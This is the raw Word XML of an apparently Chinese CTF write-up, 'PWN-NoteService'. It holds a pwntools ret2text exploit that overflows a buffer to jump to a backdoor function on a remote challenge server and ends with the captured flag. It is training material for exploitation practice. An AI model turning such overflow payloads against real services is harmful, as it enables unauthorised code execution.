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593A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="515A6E"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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515A6E"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>PWN-NoteService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552EAA09">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="328993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6519">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1076325"/>
            <wp:effectExtent l="0" t="0" r="1079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2704">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3829050" cy="20383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3D7E">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="2693670"/>
            <wp:effectExtent l="0" t="0" r="1079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A7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这走ret2text没什么好说的吧，canary也没开，也没有额外的判断条件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB540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Exp：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5491E56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from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pwn </w:t>
      </w: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import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*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8B0224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</w:p>
    <w:p w14:paraId="22C9F6E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context(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os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"linux"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terminal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[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"cmd.exe"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"/c"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"start"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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0622944D">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F06399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binary_path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"./vuln"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4309E8F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host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"47.99.147.34"</w:t>
      </w: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#网址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597CF5F3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port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10858</w:t>
      </w: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#端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18978ADF">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06EFB52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elf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ELF(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binary_path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checksec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569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="121314"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>False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4CED4EB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context.binary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elf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7ACFF2">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="240C6D5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elf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.bits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64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46DB568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context.arch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"amd64"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F0571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gdbscript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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EE04F4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b *main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0902184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c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EF41A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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAC4E6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else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080DE27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context.arch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"i386"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC54A9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gdbscript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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116FD78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b *main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E892883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c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577549EF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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA822F7">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F826EFE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context.log_level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"debug"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671257C1">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25DC4D1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args.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="79C0FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="121314"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>REMOTE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65E3764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io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remote(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host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port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1D5CBC6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else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14E6C72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io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process(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binary_path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30E2264C">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39A080E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def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2A8FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="121314"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>p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():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E05D215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    pause()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D8B59F">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="341E0C65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#todo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55736E1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backdoor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401196</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40310D2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ret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40101a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C168B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io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.recv()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23958844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offset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40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+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8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677DAB3F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payload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flat([cyclic(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offset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),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ret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,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backdoor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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5326CEBF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io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.sendline(</w:t>
      </w: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payload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49E1FB8F">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A7F852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9D1D9"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="121314"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>io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.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109BBA60">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DF1FC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288030"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1270"/>
            <wp:docPr id="5" name="图片 5" descr="1780107536293_de6f61a08f16470a9b94dd0c64a82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80107536293_de6f61a08f16470a9b94dd0c64a82b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8A4A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flag{db35a83bde913ee94d6a7200849bb08a}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2YmNjNGY3NDU1YWRjODAxM2YyMTVjMmY1YzA5YjYifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="DF7ACB01"/>
    <w:rsid w:val="0B0F68FC"/>
    <w:rsid w:val="15943DBA"/>
    <w:rsid w:val="5F5D2037"/>
    <w:rsid w:val="CEFF9266"/>
    <w:rsid w:val="DF7ACB01"/>
    <w:rsid w:val="FDFD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</Words>
  <Characters>75</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>5</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>75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2026-05-29T17:52:00Z</dcterms:created>
  <dc:creator>韦YL</dc:creator>
  <cp:lastModifiedBy>WPS_1752873804</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-30T02:28:16Z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5BDE407AA94F2C31E261196AE13CEBCB_41</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplattDocerOperationLog">
    <vt:lpwstr>3BF3545BE45EFB004CF7E1A0D18771E066E0F1387750FE4BC29858F456101FAE</vt:lpwstr>
  </property>
</Properties>
</file>